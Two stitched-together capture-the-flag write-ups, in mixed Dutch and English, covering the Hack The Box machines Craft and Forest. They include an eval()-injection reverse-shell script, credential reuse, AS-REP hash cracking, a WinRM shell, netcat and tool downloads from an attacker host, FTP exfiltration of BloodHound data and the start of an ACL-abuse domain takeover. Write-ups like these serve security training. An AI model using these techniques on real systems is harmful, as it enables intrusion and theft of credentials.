Craft is  met pensioen. Ik vond het heel leuk om het op te lossen. Het IP-adres is 10.10.10.110 en ik heb het toegevoegd aan / etc / hosts als craft.htb. Laten we meteen verder gaan!

Scan

root@kali:~/htb/craft# nmap -sV -O craft.htb -oN scan.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 05:32 EST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 05:33 (0:00:12 remaining)
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.054s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
443/tcp open  ssl/http nginx 1.15.8
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/7%OT=22%CT=1%CU=38176%PV=Y%DS=2%DC=I%G=Y%TM=5E145E69
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=8)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds

Poort 443 is open, wat betekent dat er een (waarschijnlijk) HTTPS-site op draait. Ik heb https: //craft.htb geopend in een browser:

In de rechterbovenhoek vond ik knoppen die me naar 2 verschillende subdomeinen brachten: api.craft.htb en gogs.craft.htb. Ik voegde deze toe aan /etc/hosts

Enumerating de 2 Sub-Domeinen

api.craft.htb, was niet erg interessant, omdat er een API werd gehost die alleen toegankelijk was met geldige inloggegevens.

Voordat ik de API testte, wilde ik ervoor zorgen dat er niets eenvoudiger te exploiteren was gogs.craft.htb.

Het bleek dat ik gelijk had. Er is een publiek toegankelijke repository die de broncode van de API bevat:

Bovendien was er een interessant “issue”:

Dinesh:
Fix is live and seems to be working :)

c414b16057

Gilfoyle:
I fixed the database schema so this is not an issue now.. Can we remove that sorry excuse for a "patch" before something awful happens?

Ik heb de commit bekeken die de patch bevatte en zag meteen de kwetsbaarheid:

https://gogs.craft.htb/Craft/craft-api/commit/c414b160578943acfe2e158e89409623f41da4c6

De ‘patch’ gebruikt eval () om te controleren of de ABV-waarde (wat dat ook was less) kleiner is dan 1. eval () mag nooit worden gebruikt voor gebruikersinvoer, omdat een kwaadwillende aanvaller deze kan gebruiken om RCE te behalen. Op dit moment wist ik dat ik een shell kon krijgen als ik een geldige gebruikersnaam / wachtwoord-combinatie had.

Credentials and ‘Shell As Root’

After I started looking for credentials, it wasn’t long before I found them. As it tuned out, Dinesh initially added a test script with his credentials:

https://gogs.craft.htb/Craft/craft-api/commit/10e3ba4f0a09c778d7cec673f28d410b73455a86
response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)

Nu ik geldige gegevens had, maakte ik een eenvoudig script dat een omgekeerde shell zou voortbrengen:

#!/usr/bin/env python
 
import requests
import json
 
response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
json_response = json.loads(response.text)
token =  json_response['token']
 
headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json'  }
 
print("Spwaning a reverse shell on port 443...")
brew_dict = {}
brew_dict['abv'] = '__import__("os").system("nc 10.10.14.156 443 -e /bin/sh &amp;") #'
brew_dict['name'] = 'bullshit'
brew_dict['brewer'] = 'bullshit'
brew_dict['style'] = 'bullshit'
 
json_data = json.dumps(brew_dict)
response = requests.post('https://api.craft.htb/api/brew/', headers=headers, data=json_data, verify=False)
print("Done!")
root@fury-battlestation:~/htb/blog/craft# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.156] from (UNKNOWN) [10.10.10.110] 45619
python -c 'import pty; pty.spawn("/bin/sh")'
/opt/app # whoami         
whoami
root
/opt/app # ls -lah /root
ls -lah /root
total 16
drwx------    1 root     root        4.0K Nov 10 11:16 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
-rw-------    1 root     root          21 Nov 10 11:16 .ash_history
drwx------    1 root     root        4.0K Feb  9  2019 .cache
/opt/app # ^[[24;12Rls -lah /home
ls -lah /home
total 8
drwxr-xr-x    2 root     root        4.0K Jan 30  2019 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
/opt/app # ^[[24;12R

De root was een leugen! Het kostte me wat tijd, maar ik realiseerde me dat ik in een dokcontainer zat.

GOGS Credentials & User

Omdat ik me in de directory van de app bevond, las ik de inhoud van dbtest.py om de referenties voor de database te vinden:

#!/usr/bin/env python
 
import pymysql
from craft_api import settings
 
# test connection to mysql database
 
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)
 
try: 
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)
 
finally:
    connection.close()

De inloggegevens zijn opgeslagen in craft_api / settings.py, dus ik heb de inhoud van dat bestand weergegeven:

# Flask settings
FLASK_SERVER_NAME = 'api.craft.htb'
FLASK_DEBUG = False  # Do not use debug mode in production
 
# Flask-Restplus settings
RESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'
RESTPLUS_VALIDATE = True
RESTPLUS_MASK_SWAGGER = False
RESTPLUS_ERROR_404_HELP = False
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'
 
# database
MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
MYSQL_DATABASE_DB = 'craft'
MYSQL_DATABASE_HOST = 'db'
SQLALCHEMY_TRACK_MODIFICATIONS = False

Daarna heb ik verbinding gemaakt met de database om te zien of er inloggegevens zijn die ik zou kunnen gebruiken:

/opt/app # ^[[50;12Rpython
python
Python 3.6.8 (default, Feb  6 2019, 01:56:13) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pymysql
import pymysql
>>> from craft_api import settings
from craft_api import settings
>>> connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
...                              user=settings.MYSQL_DATABASE_USER,
...                              password=settings.MYSQL_DATABASE_PASSWORD,
...                              db=settings.MYSQL_DATABASE_DB,
...                              cursorclass=pymysql.cursors.DictCursor)
>>> 

>>> def exec_sql(sql):
        cursor = connection.cursor()
        cursor.execute(sql)
        #result = cursor.fetchone()
        result = cursor.fetchall()
        print(result)def exec_sql(sql):
...         cursor = connection.cursor()
...         cursor.execute(sql)
...         #result = cursor.fetchone()
...         result = cursor.fetchall()
... 
        print(result)
... 

>>> exec_sql("SHOW DATABASES;")
exec_sql("SHOW DATABASES;")
[{'Database': 'craft'}, {'Database': 'information_schema'}]
>>> exec_sql("SHOW TABLES")
exec_sql("SHOW TABLES")
[{'Tables_in_craft': 'brew'}, {'Tables_in_craft': 'user'}]
>>> exec_sql("SELECT * FROM user")
exec_sql("SELECT * FROM user")
[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
>>> 

De database bevat de volgende gegevens:

dinesh 4aUh0A8PbVJxgd
ebachman llJ77D8QFkLPQB
gilfoyle ZEU3N8WNM2rh4T

Ik heb ze geprobeerd op SSH, maar ze werkten niet. Ze leken echter te werken op het GOGS-platform. Gilfoyle had nog een privérepository die interessant leek:

Ik klikte de .ssh folder en zag de volgende ssh sleutels:

Deze 2 keys gedownload , en mbv chmod 600 op juiste ssh permissie ingesteld.

De sleutel is beveiligd met een wachtwoord. Gelukkig heeft Gilfoyle zijn GOGS hergebruikt passwoord, ZEU3N8WNM2rh4T, dus ik had de mogelijkheid om verbinding te maken met de machine:

root@kali:~/htb/craft/ssh# ssh gilfoyle@craft.htb -i id_rsa
The authenticity of host 'craft.htb (10.10.10.110)' can't be established.
ECDSA key fingerprint is SHA256:sFjoHo6ersU0f0BTzabUkFYHOr6hBzWsSK0MK5dwYAw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'craft.htb,10.10.10.110' (ECDSA) to the list of known hosts.


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Enter passphrase for key 'id_rsa': ZEU3N8WNM2rh4T
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gilfoyle@craft:~$ pwd
/home/gilfoyle
root@craft:/home/gilfoyle# cat user.txt
bbf4b0cadfa3d4e6d0914c9cd5a612d4
gilfoyle@craft:~$

Root verkrijgen

Nadat ik de gebruikersvlag had gekregen, herinnerde ik me een interessante map in de privérepository met de naam kluis, dus ik checkte het uit:

Na  wat te ggogelen vond ik de  application’s website.

Basically, the system uses token to grant access to services across machines. I also found a file named .vault-token in the user’s home directory, so I tried to see the token’s capabilities:

gilfoyle@craft:~$ cat ~/.vault-token 
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
gilfoyle@craft:~$ vault token capabilities f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
root
gilfoyle@craft:~$

Kortom, het systeem gebruikt token om toegang te verlenen tot services op verschillende machines. Ik vond ook een bestand met de naam .vault-token in de thuismap van de gebruiker, dus ik probeerde de mogelijkheden van het token te bekijken:

gilfoyle@craft:~$ vault login -address=https://vault.craft.htb:8200 token=f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor       1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration       ∞
token_renewable      false
token_policies       ["root"]
identity_policies    []
policies             ["root"]
gilfoyle@craft:~$

Daarna heb ik verbinding gemaakt met SSH als root met behulp van de eenmalige wachtwoordoptie (OTP) van “Vault”:

gilfoyle@craft:~$ vault ssh -mode otp root@localhost
WARNING: No -role specified. Use -role to tell Vault which ssh role to use for
authentication. In the future, you will need to tell Vault which role to use.
For now, Vault will attempt to guess based on the API response. This will be
removed in the Vault 1.1.
Vault SSH: Role: "root_otp"
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Password: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# pwd
/root
root@craft:~# cat root.txt 
831d64ef54d92c1af795daae28a11591
root@craft:~#

Auteur : Jacco Straathof

htb-forest-nl

As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.

root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e

After trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with hashcat.

[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
---snip---
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e:s3rvice
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 -> pommiey4632@hotmail.com
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16

So apparently Alfresco’s password is s3rvice. The next thing I did was tweak the WinRM shell I made earlier for Hackthebox – Heist to include correct username, password and IP address

require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.161:5985/wsman',
  user: 'svc-alfresco',
  password: 's3rvice',
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end

and run it to get shell access.

root@kalivm:~/Forest# ruby shell.rb 
PS > whoami
htb\svc-alfresco

All you have to do is get the user hash and start escalating privileges

PS > type ..\Desktop\user.txt
e5e4*****d9ed

Privilege Escalation

The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe

PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950 20191025120253_BloodHound.zip
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1

After the SharpHound script and binary file are transferred, I run them with the user svc-alfresco and the script provides a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey was to easily create and run an FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)): 
put 20191025120253_BloodHound.zip
quit

Of course, this approach requires an active FTP server on my attacker, which can be easily done with Python

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).

Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.

In the “bloodhound overview” of the shortest path to domain manager, I see that a user who is part of the ‘Exchange Windows permissions’ group has the ability to write the ACL of the entire HTB.Local domain, for example the Password hashes. I can also see that the svc-alfresco user has GenericAll permissions for that particular group through their delegated memberships of `Service Accounts`,` Privileged IT Accounts` and `Account Operators`.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

